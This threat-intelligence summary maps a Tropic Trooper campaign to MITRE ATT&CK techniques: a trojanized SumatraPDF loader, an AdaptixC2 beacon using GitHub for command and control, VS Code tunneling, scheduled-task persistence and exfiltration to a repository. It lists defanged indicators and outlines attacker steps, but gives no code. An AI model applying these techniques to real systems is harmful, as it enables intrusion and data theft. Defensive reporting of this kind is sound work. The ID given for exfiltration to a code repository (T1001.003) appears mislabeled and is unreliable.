Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener

MITRE Techniques

• [T1585.003 ] Resource Development: Establish Accounts: Cloud Accounts – The actor created a GitHub account for C2 (‘The threat actor created the GitHub account cvaS23uchsahs, which hosted the RSS registry used for C2 communication.’)
• [T1587.001 ] Resource Development: Develop Capabilities: Malware – The actor developed a custom GitHub listener for the AdaptixC2 agent and a custom TOSHIS loader (‘the threat actor developed a custom listener for the AdaptixC2 Beacon agent that utilized the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.’)
• [T1588.001 ] Resource Development: Obtain Capabilities: Malware – The actor obtained and deployed the open-source AdaptixC2 Beacon agent as the backdoor (‘The threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.’)
• [T1588.002 ] Resource Development: Obtain Capabilities: Tool – The actor used VS Code’s tunnel feature for remote access (‘The threat actor used VS Code’s tunnel feature for remote access to compromised systems.’)
• [T1608.001 ] Resource Development: Stage Capabilities: Upload Malware – A second-stage shellcode was hosted on 58.247.193[.]100 for the loader to download and execute (‘the initial loader was designed to download and execute [a] second-stage shellcode payload on their server at 58.247.193[.]100’).
• [T1608.002 ] Resource Development: Stage Capabilities: Upload Tool – The actor uploaded VS Code to bashupload[.]app which victims downloaded (‘The threat actor uploaded VS Code to bashupload[.]app which was subsequently downloaded onto the victim machines.’)
• [T1204.002 ] Execution: User Execution: Malicious File – The campaign required user execution of the trojanized lure ‘美英与美澳核潜艇合作的比较分析(2025).exe’ (‘The attack sequence requires a user to run the malicious file titled “美英与美澳核潜艇合作的比较分析(2025).exe”.’)
• [T1106 ] Execution: Native API – The loader used WinCrypt and ShellExecuteW to decrypt and display the decoy PDF (‘it retrieve[d] a second-stage shellcode … decrypts it using AES-128 CBC with WinCrypt … and opens it using ShellExecuteW.’)
• [T1059.003 ] Execution: Command and Scripting Interpreter: Windows Command Shell – The actor executed Windows shell commands and cURL for reconnaissance and tool downloads (‘The threat actor utilized the Windows Command Shell to run several commands … and to use cURL for downloading VS Code.’)
• [T1053.005 ] Persistence: Scheduled Task/Job: Scheduled Task – The actor created scheduled tasks using schtasks to persist the AdaptixC2 agent (‘The threat actor created a scheduled task using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.’)
• [T1036.001 ] Defense Evasion: Masquerading: Invalid Code Signature – The trojanized SumatraPDF included original certificates but an invalid signature (‘the signature of this binary is invalid because it has been trojanized with TOSHIS loader.’)
• [T1036.004 ] Defense Evasion: Masquerading: Masquerade Task or Service – Scheduled tasks were named to blend in with legitimate services (MSDNSvc, MicrosoftUDN) (‘the threat actor created scheduled tasks with names intended to blend in with legitimate system tasks such as MSDNSvc and MicrosoftUDN.’)
• [T1620 ] Defense Evasion: Reflective Code Loading – The loader downloaded and reflectively loaded the AdaptixC2 shellcode in-memory (‘the initial loader downloaded a second-stage shellcode from the C2 IP 58.247.193[.]100 which reflectively loads the AdaptixC2 Beacon agent.’)
• [T1027.007 ] Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution – The loader resolves APIs by comparing Adler-32 hashes (‘The initial loader identified Windows APIs by comparing Adler-32 hashes of their names.’)
• [T1027.013 ] Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File – The loader downloaded an encrypted second-stage payload and decrypted it with AES-128 (‘The initial loader downloaded a second-stage payload and decrypted the shellcode in-memory using AES-128.’)
• [T1127 ] Defense Evasion: Trusted Developer Utilities Proxy Execution – The actor downloaded Roslyn to compile/execute code (‘The threat actor downloaded Roslyn, an open-source .NET compiler, to compile and execute malicious code.’)
• [T1016 ] Discovery: System Network Configuration Discovery – The actor ran arp and queried ipinfo.io to learn local and external network info (‘The threat actor ran the command arp /a … The threat actor sent requests to ipinfo.io to identify the external IP address of compromised machines.’)
• [T1005 ] Collection: Data from Local System – The AdaptixC2 agent used fileupload functionality to exfiltrate local files (‘The threat actor used AdaptixC2 Beacon agent’s fileupload feature to exfiltrate files from infected machines.’)
• [T1071.001 ] Command and Control: Application Layer Protocol: Web Protocols – The loader and beacon used HTTP/S for payload retrieval and GitHub communications (‘The TOSHIS loader downloaded … over HTTP from 58.247.193[.]100. The AdaptixC2 Beacon agent used HTTP/S to communicate with its GitHub C2.’)
• [T1102.002 ] Command and Control: Web Service: Bidirectional Communication – The actor used GitHub Issues and repo contents for bidirectional C2 and exfiltration (‘The threat actor used GitHub for bidirectional C2 communication.’)
• [T1219.001 ] Command and Control: Remote Access Tools: IDE Tunneling – The actor deployed VS Code and used its tunneling for remote interactive access (‘The threat actor deployed VS Code and used its remote tunneling feature for interactive access.’)
• [T1105 ] Command and Control: Ingress Tool Transfer – The actor used cURL to retrieve VS Code and other tools from external servers (‘The threat actor utilized the cURL command to retrieve tools from external servers onto the compromised system.’)
• [T1132.001 ] Command and Control: Data Encoding: Standard Encoding – The actor used Base64 and RC4 to encode/obfuscate C2 data (‘The threat actor used Base64 and RC4 to obscure C2 communications.’)
• [T1573.001 ] Command and Control: Encrypted Channel: Symmetric Cryptography – The AdaptixC2 agent encrypted C2 traffic using an RC4 session key (‘The AdaptixC2 beacon agent encrypted its C2 traffic using an RC4 session key.’)
• [T1573.002 ] Command and Control: Encrypted Channel: Asymmetric Cryptography – The actor used GitHub API over HTTPS for secure communication (‘The threat actor used the GitHub API for C2, which communicates over HTTPS.’)
• [T1001.003 ] Exfiltration: Exfiltration Over Web Service: Exfiltration to Code Repository – The actor exfiltrated data via GitHub repo uploads and issue comments (‘The threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.’)
• [T1041 ] Exfiltration: Exfiltration Over C2 Channel – Data was exfiltrated over the same AdaptixC2/GitHub channel used for commands (‘The threat actor exfiltrated data over the same channel used for C2 communication.’)